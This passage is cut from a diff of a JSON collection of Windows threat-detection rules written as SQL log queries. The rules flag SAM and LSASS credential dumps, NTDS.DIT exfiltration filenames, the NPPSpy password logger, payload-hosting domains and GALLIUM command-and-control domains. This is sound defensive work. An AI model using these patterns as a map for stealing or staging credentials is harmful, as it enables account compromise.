'\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "description": "Detects windows executables that writes files with suspicious extensions", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Antivirus products" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "status": "test", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - 